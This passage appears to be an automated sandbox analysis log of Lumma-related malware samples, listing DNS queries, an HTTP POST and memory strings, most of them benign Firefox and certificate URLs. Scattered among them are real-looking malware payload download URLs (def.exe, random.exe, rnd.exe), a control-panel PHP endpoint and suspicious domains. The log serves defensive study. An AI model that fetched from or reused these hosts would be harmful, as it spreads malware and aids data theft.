"*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00154000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: tail-cease.cyou
Source: global traffic DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tail-cease.cyou
Source: firefox.exe, 00000018.00000002.2853189141.000001DE0398A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/F1
Source: 8e3ce0163b.exe, 8e3ce0163b.exe, 00000008.00000003.2849095457.0000000005A42000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2848993228.0000000005A56000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2848641089.0000000001344000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000002.2966951132.00000000008DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeX
Source: 8e3ce0163b.exe, 0000000A.00000002.2966951132.00000000008DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeZ
Source: 8e3ce0163b.exe, 00000008.00000003.2848641089.0000000001344000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exel
Source: 8e3ce0163b.exe, 0000000A.00000002.2963837952.000000000053B000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exes
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exesi(
Source: 8e3ce0163b.exe, 8e3ce0163b.exe, 00000008.00000003.2848641089.0000000001344000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 8e3ce0163b.exe, 00000008.00000003.2848641089.0000000001344000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeZ
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/v
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe9
Source: 80c14d0add.exe, 00000009.00000002.2661265680.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000019.00000002.2835040452.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 80c14d0add.exe, 00000009.00000002.2661265680.0000000000810000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000009.00000002.2661265680.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000019.00000002.2835040452.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000019.00000002.2835040452.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 80c14d0add.exe, 00000009.00000002.2661265680.0000000000810000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000009.00000002.2661265680.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000019.00000002.2835040452.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000019.00000002.2835040452.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: 80c14d0add.exe, 00000009.00000002.2661265680.0000000000810000.00000004.00000020.00020000.00000000.sdmp, 80c14d0add.exe, 00000019.00000002.2835040452.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: 80c14d0add.exe, 00000009.00000002.2661265680.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php3
Source: 80c14d0add.exe, 00000009.00000002.2661265680.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
Source: 80c14d0add.exe, 00000009.00000002.2661265680.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206q
Source: 8e3ce0163b.exe, 8e3ce0163b.exe, 00000008.00000003.2848641089.0000000001344000.00000004.00000020.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/rnd.exe
Source: 8e3ce0163b.exe, 00000008.00000003.2848641089.0000000001344000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/rnd.exe:
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/rnd.exes
Source: 8e3ce0163b.exe, 0000000A.00000002.2965376322.00000000008B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/rnd.exes/(r
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2958869168.000001DE7FD7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000018.00000002.2890541633.000001DE0605E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2921111201.000001DE07386000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2907746771.000001DE07299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlfinish
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F78A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733836860.000001DE7F793000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2738708319.000001DE7F762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F78A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733836860.000001DE7F793000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2738708319.000001DE7F762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000018.00000002.2956659069.000001DE7F78A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733836860.000001DE7F793000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000018.00000002.2954557391.000001DE74003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2874879961.000001DE04766000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2937893099.000001DE0BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2843947089.000001DE03461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2863646474.000001DE040D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2921111201.000001DE07303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857803072.000001DE03B3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2812061768.000001DE0BF9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2958869168.000001DE7FD7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjsMust
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000018.00000002.2929242704.000001DE075D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000018.00000002.2929242704.000001DE075D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2958869168.000001DE7FD7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2958869168.000001DE7FD7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%sCan
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: 8e3ce0163b.exe, 0000000A.00000003.2748465921.000000000086B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.c
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000018.00000002.2946552739.000001DE0E41B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 00000018.00000002.2865998121.000001DE0418F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0590B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2957595100.000001DE7F8A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2843947089.000001DE03461000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000018.00000002.2865998121.000001DE04111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000018.00000003.2817794939.000001DE05659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulE
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0019E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulUsing
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/skin/privatebrowsing/f
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/autoco
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/popupn
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0019E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://passwordmgr/locale/passwordmgr
